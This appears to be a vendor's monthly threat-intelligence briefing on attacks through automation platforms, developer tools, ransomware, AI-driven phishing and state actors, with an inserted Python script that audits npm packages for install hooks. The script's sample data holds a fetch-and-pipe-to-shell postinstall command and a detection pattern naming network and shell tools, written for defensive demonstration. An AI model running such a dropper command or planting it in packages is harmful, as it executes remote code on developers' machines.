Threatsploit Adversary Report January 2026
A monthly briefing revealing how attackers enter through automation, identity and developer systems long before alerts fire.
This edition tracks a clear change in infiltration tactics. Attackers are no longer confined to probing the network perimeter. They are entering through the everyday software and services that organisations depend on. Compromises now originate inside workflow engines, development tools, shared libraries, browser components and identity systems. These entry points give adversaries immediate proximity to core operations and let them bypass controls built around the perimeter.
What makes these incidents especially serious is how well they blend into legitimate activity. Many of these attacks move through systems quietly, operating beneath alert thresholds and hiding inside trusted processes. By examining real intrusions, this report helps security teams understand where modern weak spots are forming and highlights the internal assets that demand immediate attention.
1. Compromise Through Automation Platforms
Vulnerabilities in n8n and React Server Components let attackers execute commands inside backend workflows, turning operational pipelines into remote control points.
2. Developer Tools Used as Entry Points
GlassWorm-based VS Code extensions and fake npm modules harvest credentials, siphon source code, and tamper with build environments, achieving intrusion before software is even deployed.
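One check a practitioner will want after reading this item is an inventory of which installed packages run code at install time, because a malicious npm module usually does its work from a lifecycle hook rather than from the API it advertises. The script below is an added illustration, not code from the report or from any of the named campaigns. It walks a node_modules tree, lists every package that declares a preinstall, install, postinstall or prepare script, and flags commands containing crude indicators such as curl, wget or an inline `node -e` payload; the indicator list is an assumption for demonstration and should be tuned to your environment. The sample tree it audits by default is constructed in a temporary directory and contains no real packages.

```python
"""Audit a node_modules tree for packages that declare npm lifecycle hooks.

Added illustration for this item; not code from the report. Assumes the
standard node_modules layout where each package directory holds a package.json.
"""
import json
import os
import re
import sys
import tempfile

# npm runs these scripts automatically during `npm install`, so a package that
# declares them executes code on every developer machine and CI runner.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Crude indicators (an assumption, not a vetted signature set) of a hook doing
# something other than building the package.
SUSPICIOUS = re.compile(
    r"curl|wget|node\s+-e|\beval\b|base64|powershell|/dev/tcp|Invoke-WebRequest",
    re.IGNORECASE,
)


def find_install_hooks(root):
    """Return every lifecycle hook declared by any package below `root`."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip it, do not abort the audit
        scripts = manifest.get("scripts")
        if not isinstance(scripts, dict):
            continue
        for hook in LIFECYCLE_HOOKS:
            command = scripts.get(hook)
            if isinstance(command, str) and command.strip():
                hits.append({
                    "package": manifest.get("name", os.path.basename(dirpath)),
                    "hook": hook,
                    "command": command,
                    "suspicious": bool(SUSPICIOUS.search(command)),
                })
    return hits


def build_sample_tree():
    """Create a constructed node_modules tree for demonstration (no real packages)."""
    root = os.path.join(tempfile.mkdtemp(), "node_modules")
    packages = {
        # No lifecycle hook at all: should not appear in the audit.
        "plain-utils": {"scripts": {"test": "node test.js"}},
        # Legitimate-looking native build step: reported for review, not flagged.
        "native-helper": {"scripts": {"postinstall": "node install.js"}},
        # Hypothetical dropper: inline node payload fetching and piping to a shell.
        "evil-telemetry": {"scripts": {
            "postinstall": "node -e \"require('child_process').exec('curl http://example.invalid/x | sh')\""
        }},
    }
    for name, extra in packages.items():
        os.makedirs(os.path.join(root, name))
        manifest = {"name": name, "version": "1.0.0", **extra}
        with open(os.path.join(root, name, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return root


if __name__ == "__main__":
    # Usage: python audit_hooks.py [path/to/node_modules]; defaults to the sample tree.
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for hit in find_install_hooks(target):
        flag = "SUSPICIOUS" if hit["suspicious"] else "review"
        print(f"{flag:10} {hit['package']:20} {hit['hook']:12} {hit['command']}")
```

Run it against a real checkout's node_modules to get a short list of packages that deserve a look; a package with a lifecycle hook is not automatically malicious (native add-ons build themselves this way), but every entry flagged SUSPICIOUS should be explained before the project is installed again on a machine holding credentials. Setting `ignore-scripts=true` in .npmrc stops the hooks from running at all until the list has been reviewed.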
3. Ransomware Campaigns That Disable Defences First
VolkLocker and Shanya-enabled crews hide their payloads, strip away monitoring, and attack Windows and Linux environments together, maximising disruption before anyone notices.
4. Artificial Intelligence Driving Credential Theft
WormGPT-type tools and browser-embedded phishing kits copy banking and login pages with precision while intercepting authentication codes and hijacking live sessions.
5. State-Backed Groups Embedded in Business Infrastructure
Activity linked to China, Russia, Iran, and North Korea shows malware delivered through Group Policy files, QR lures, notarised macOS installers, and cloud-synced services, with persistence designed to last for months.
Need Help Responding to These Threats?
Talk to our CREST-certified threat intelligence and incident response experts today